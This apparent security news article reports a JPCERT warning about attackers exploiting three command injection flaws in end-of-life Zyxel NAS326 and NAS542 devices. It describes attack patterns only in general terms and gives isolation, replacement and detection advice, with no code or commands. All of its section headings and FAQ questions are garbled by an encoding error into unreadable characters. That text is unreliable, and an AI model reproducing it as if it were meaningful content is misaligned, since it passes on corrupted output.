๐๐ฃ๐๐๐ฅ๐ง/๐๐ issued a nationwide warning after researchers observed attackers exploiting multiple command injection vulnerabilities in Zyxel NAS devices that many organizations still operate on internal and remote-accessible networks. These flaws, which affect end-of-life NAS models, now give threat actors direct paths to arbitrary command execution, full device takeover, and eventual entry into broader environments that depend on the compromised NAS units for storage or backups.
๐ง๐ต๐ฒ ๐ฎ๐ฐ๐๐ถ๐๐ฒ ๐ฒ๐ ๐ฝ๐น๐ผ๐ถ๐๐ appear widespread. Attackers rapidly scan vulnerable appliances, execute injected payloads, and deploy automation to maintain control. Because these devices often sit in trusted network zones, every successful compromise carries downstream risk to additional assets.
๐๐ฃ๐๐๐ฅ๐ง confirmed exploitation of three specific vulnerabilities tracked as CVE-2024-29972, CVE-2024-29973, and CVE-2024-29974. These bugs impact Zyxel NAS326 and NAS542 devices, which reached end-of-support earlier in 2023. Attackers now aggressively abuse these flaws because no vendor patches remain available, and many organizations leave their NAS web interfaces exposed.
๐๐น๐น ๐๐ต๐ฟ๐ฒ๐ฒ ๐ฐ๐ผ๐บ๐บ๐ฎ๐ป๐ฑ ๐ถ๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐ฏ๐๐ด๐ allow unauthenticated attackers to push arbitrary commands directly into the firmwareโs request-handling components. And since many deployments rely on default configurations, exploitation often requires no credentials. This makes these flaws ideal for botnet operators, cryptomining crews, and access brokers that sell footholds to ransomware affiliates.
๐๐ก๐๐๐จ๐ฐ๐๐-๐ฌ๐ญ๐ฒ๐ฅ๐ ๐๐๐ฆ๐ฉ๐๐ข๐ ๐ง๐ฌ ๐๐ซ๐ ๐๐๐ ๐ข๐ง๐ง๐ข๐ง๐ ๐ญ๐จ ๐ญ๐จ๐ฎ๐๐ก ๐ญ๐ก๐๐ฌ๐ ๐๐๐ฏ๐ข๐๐๐ฌ, and researchers already link some exploitation waves to infrastructure associated with credential-harvesting and lateral-movement frameworks. While no single actor exclusively owns these vulnerabilities, the activity pattern resembles opportunistic, mass-scale harvesting designed to expand access inventories rapidly.
๐๐๐๐ฎ๐ฐ๐ธ ๐๐ฒ๐ฐ๐ต๐ป๐ถ๐พ๐๐ฒ: ๐ณ๐ฎ๐๐ ๐๐ฐ๐ฎ๐ป, ๐ณ๐ฎ๐๐ ๐ถ๐ป๐ท๐ฒ๐ฐ๐, ๐ณ๐ฎ๐๐ ๐ฝ๐ฒ๐ฟ๐๐ถ๐๐
๐๐ฐ๐๐ถ๐๐ฒ ๐ฒ๐ ๐ฝ๐น๐ผ๐ถ๐ ๐ฝ๐ฎ๐๐๐ฒ๐ฟ๐ป๐ ๐๐ฃ๐๐๐ฅ๐ง ๐ถ๐ ๐๐ฒ๐ฒ๐ถ๐ป๐ด
Attackers aggressively hunt exposed NAS units by scanning for the vulnerable web endpoints. As soon as they identify a target, they inject commands that fetch remote payloads, create persistence through scheduled tasks or modified startup scripts, and open tunnels to external infrastructure. Because these NAS devices often store corporate data or backups, this foothold enables adversaries to harvest sensitive files and map adjacent network segments.
๐ช๐ต๐ ๐๐ต๐ฒ๐๐ฒ ๐ฒ๐ป๐ฑ-๐ผ๐ณ-๐น๐ถ๐ณ๐ฒ ๐ฑ๐ฒ๐๐ถ๐ฐ๐ฒ๐ ๐ฟ๐ฒ๐บ๐ฎ๐ถ๐ป ๐ต๐ถ๐ด๐ต-๐๐ฎ๐น๐๐ฒ
Although Zyxel retired support, many organizations continue to depend on these NAS systems because they sit deep within legacy workflows. Attackers understand this operational inertia. Since no patches exist, the devices offer an evergreen entry route. That combination makes them ideal for long-term exploitation, especially when the NAS stores internal documentation, VM images, intellectual property or unencrypted datasets.
๐ฅ๐ฎ๐ป๐๐ผ๐บ๐๐ฎ๐ฟ๐ฒ ๐ด๐ฟ๐ผ๐๐ฝ๐ ๐ฐ๐ฎ๐ป ๐ฎ๐ฏ๐๐๐ฒ ๐ฐ๐ผ๐บ๐ฝ๐ฟ๐ผ๐บ๐ถ๐๐ฒ๐ฑ ๐ก๐๐ฆ ๐๐ป๐ถ๐๐ ๐ฎ๐ ๐ฒ๐ป๐๐ฟ๐ ๐ฝ๐ผ๐ถ๐ป๐๐
Because threat actors frequently pair command injection with credential theft and network pivoting, these Zyxel NAS flaws offer a straightforward way to set the stage for ransomware. Once attackers gain a foothold, they often enumerate SMB shares, search for privileged accounts, and stage encryption tooling inside the trusted network. With NAS devices acting as storage hubs, ransomware operators can use them to move laterally or corrupt backups.
๐๐ฃ๐๐๐ฅ๐งโ๐ ๐ฎ๐ฑ๐๐ถ๐ฐ๐ฒ: ๐ถ๐๐ผ๐น๐ฎ๐๐ฒ ๐ถ๐บ๐บ๐ฒ๐ฑ๐ถ๐ฎ๐๐ฒ๐น๐
JPCERT urges organizations to remove NAS326 and NAS542 devices from external exposure, physically isolate them if necessary, and replace them with supported hardware. Although some defenders attempt to mitigate command injection by applying firewall rules or restricting known URLs, attackers typically bypass superficial blocking by leveraging alternate execution points or chaining multiple injection vectors.
๐ช๐ต๐ ๐๐ต๐ถ๐ ๐บ๐ฎ๐๐๐ฒ๐ฟ๐ ๐ณ๐ผ๐ฟ ๐ผ๐ฟ๐ด๐ฎ๐ป๐ถ๐๐ฎ๐๐ถ๐ผ๐ป๐ ๐ถ๐ป ๐ฎ๐ฌ๐ฎ๐ฑ
Organizations continue shifting toward hybrid infrastructures, and adversaries increasingly exploit overlooked appliances to bridge cloud and on-prem environments. Consequently, compromised NAS systems now create bidirectional risk: attackers can steal data from internal shares while using the NAS to exfiltrate cloud credentials or API keys stored within developer backups. Because many emerging campaigns focus on credential harvesting as a precursor to ransomware, every compromised NAS introduces strategic exposure that far exceeds the applianceโs original role.
FAQs
๐ค: ๐๐ผ๐ ๐ฑ๐ผ ๐ ๐ธ๐ป๐ผ๐ ๐ถ๐ณ ๐บ๐ ๐ก๐๐ฆ๐ฏ๐ฎ๐ฒ ๐ผ๐ฟ ๐ก๐๐ฆ๐ฑ๐ฐ๐ฎ ๐ถ๐ ๐ฐ๐ผ๐บ๐ฝ๐ฟ๐ผ๐บ๐ถ๐๐ฒ๐ฑ?
You can check for suspicious processes, unexpected scheduled tasks, new startup scripts, unexplained outbound traffic, or unknown binaries stored within user-accessible shares. Because attackers often modify configuration files, any unexpected behavior should trigger deeper forensic review.
๐ค: ๐๐ฎ๐ป ๐ ๐บ๐ถ๐๐ถ๐ด๐ฎ๐๐ฒ ๐๐ต๐ฒ๐๐ฒ ๐ณ๐น๐ฎ๐๐ ๐๐ถ๐๐ต๐ผ๐๐ ๐ฟ๐ฒ๐ฝ๐น๐ฎ๐ฐ๐ถ๐ป๐ด ๐๐ต๐ฒ ๐ฑ๐ฒ๐๐ถ๐ฐ๐ฒ?
Replacement remains the only reliable long-term path. While network isolation lowers exposure, determined attackers still find paths to execution if the device stays reachable.
๐ค: ๐ช๐ต๐ ๐ฑ๐ผ ๐ฎ๐๐๐ฎ๐ฐ๐ธ๐ฒ๐ฟ๐ ๐๐ฎ๐ฟ๐ด๐ฒ๐ ๐ฒ๐ป๐ฑ-๐ผ๐ณ-๐๐๐ฝ๐ฝ๐ผ๐ฟ๐ ๐ต๐ฎ๐ฟ๐ฑ๐๐ฎ๐ฟ๐ฒ?
Attackers value predictable, unpatchable systems because each one provides a guaranteed entry point. As defenders retire other vulnerable equipment, EoL storage appliances now represent high-value footholds.
